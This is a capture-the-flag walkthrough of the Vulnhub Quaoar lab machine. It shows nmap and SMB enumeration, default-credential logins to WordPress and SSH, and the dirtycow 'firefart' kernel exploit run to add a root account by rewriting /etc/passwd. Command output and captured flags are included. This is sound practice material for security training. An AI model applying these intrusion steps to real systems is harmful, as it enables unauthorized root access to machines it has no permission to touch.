Vulnhub Quaoar Walkthrough


Below you’ll find my results from the Vulnhub Quaoar machine, found here. There are a few ways to root this…here’s what I did initially.

First – NMAP Discovery (yes, I cheated and got the IP from my DHCP server…)

nmap -sS -sV 192.168.10.152 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-28 23:37 EDT

Nmap scan report for 192.168.10.152
Host is up (0.030s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see 80 open, so let’s check for low hanging fruit here…

root@kali:~# curl http://192.168.10.152/robots.txt
Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|

Ok…there may be a WP install, let’s check it out.

root@kali:~# curl http://192.168.10.152/wordpress/ | html2text 
[...snip...]
****** Quaoar ******
Search
 Primary Menu Skip_to_content
    * Sample_Page
 Search for: [Unknown INPUT type]  [Search]

****** What_is_Quaoar? ******
October_22,_2016 admin
Leave_a_comment
https://fr.wikipedia.org/wiki/%2850000%29_Quaoar

****** Hello_world! ******
October_12,_2016 admin
Leave_a_comment
Welcome to WordPress. This is your first post. Edit or delete it, then start
blogging!
***** Just another WordPress site *****
 Search for: [Unknown INPUT type]  [Search]
****** Recent Posts ******
    * What_is_Quaoar?
    * Hello_world!
****** Recent Comments ******
****** Archives ******
    * October_2016
****** Categories ******
    * Uncategorized
****** Meta ******
    * Log_in
    * Entries_RSS
    * Comments_RSS
    * WordPress.org
Proudly_powered_by_WordPress

Go to …/wp-admin, and try the obvious combinations of usernames and passwords, and low and behold, we’re successful. (admin/admin)

WordPress admin access

Let’s make a note of that for now, and check a few other things. Since we saw 139 and 445 open, let’s check that out.

root@kali:~# enum4linux 192.168.10.152
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 29 08:53:32 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.10.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.10.152    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.10.152    |
 ============================================== 
Looking up status of 192.168.10.152
  QUAOAR          <00> -         B <ACTIVE>  Workstation Service
  QUAOAR          <03> -         B <ACTIVE>  Messenger Service
  QUAOAR          <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
  WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
  WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

  MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.10.152    |
 ======================================= 
[+] Server 192.168.10.152 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.10.152    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.10.152    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.10.152 from smbclient: 
[+] Got OS info for 192.168.10.152 from srvinfo:
  QUAOAR         Wk Sv PrQ Unx NT SNT Quaoar server (Samba, Ubuntu)
  platform_id     :	500
  os version      :	4.9
  server type     :	0x809a03

 =============================== 
|    Users on 192.168.10.152    |
 =============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: 
index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: viper	Name: viper	Desc: 
index: 0x3 RID: 0x3ea acb: 0x00000010 Account: wpadmin	Name: 	Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: root	Name: root	Desc: 

user:[nobody] rid:[0x1f5]
user:[viper] rid:[0x3e8]
user:[wpadmin] rid:[0x3ea]
user:[root] rid:[0x3e9]

[...snip...]

Interesting…there’s a local user “wpadmin” Since the WP install was using admin/admin, let’s see if wpadmin might be using something similar. (wpadmin/wpadmin)

root@kali:~# ssh wpadmin@192.168.10.152
wpadmin@192.168.10.152's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Oct 29 08:58:06 EDT 2017
[...snip...]

Success! Let’s check some basics…and find our flag.

$ echo $SHELL
/bin/sh
$ pwd
/home/wpadmin
$ ls -lahS
total 12K
drwxr-xr-x 2 root root    4.0K Oct 22  2016 .
drwxr-xr-x 3 root root    4.0K Oct 24  2016 ..
-rw-r--r-- 1 wpadmin  wpadmin   33 Oct 22  2016 flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

Now here’s where you could go a couple of different directions. For better or worse, I went for the quick and easy win, and it worked.

Check the kernel version…

$ uname -a
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux

With the OSCP labs still fresh in my mind, I know there are several vulnerabilities that affect this kernel. One of those being “dirtycow,” and a derivative “firefart.” Not the best options if you’re going for stealth of course, but in this case, we’re not focused on that.

On our target machine, we check to see if gcc is installed, which it is not. We then copy the exploit to our Kali machine, and compile it there. Since we have ssh access onto the target, we can scp the file over. Note – /home/wpadmin was owned by root and the wpadmin user had no write access to it…so we save the exploit to /tmp.

[TARGET]
$ gcc -v
-sh: 15: gcc: not found

[KALI]
root@kali:~# gcc -pthread dirty.c -o dirty -lcrypt -m32
root@kali:~# scp dirty wpadmin@192.168.10.152:/tmp
wpadmin@192.168.10.152's password: 
dirty                                                                                                   100%   12KB   2.4MB/s   00:00 

On our target, we make the file executable and run it.

$ chmod +x dirty
$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fik57D3GJz/tk:0:0:pwned:/root:/bin/bash

mmap: b77bb000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Then we can log in to the target using our newly created “firefart” account.

root@kali:~# ssh firefart@192.168.10.152
firefart@192.168.10.152's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Oct 29 09:23:56 EDT 2017

[...snip...]
firefart@Quaoar:~# cd /root
firefart@Quaoar:~# ls
flag.txt vmware-tools-distrib
firefart@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb

Admittedly, I did not find the 3rd flag. However, there is a good write up here: http://www.chokepoint.net/2017/03/hackfest2016-quaoar-vulnhub-walk-through.html which also provides some good advice on why to check cron jobs…in this case, because the 3rd flag was there!

Nicely done, k0ncepts.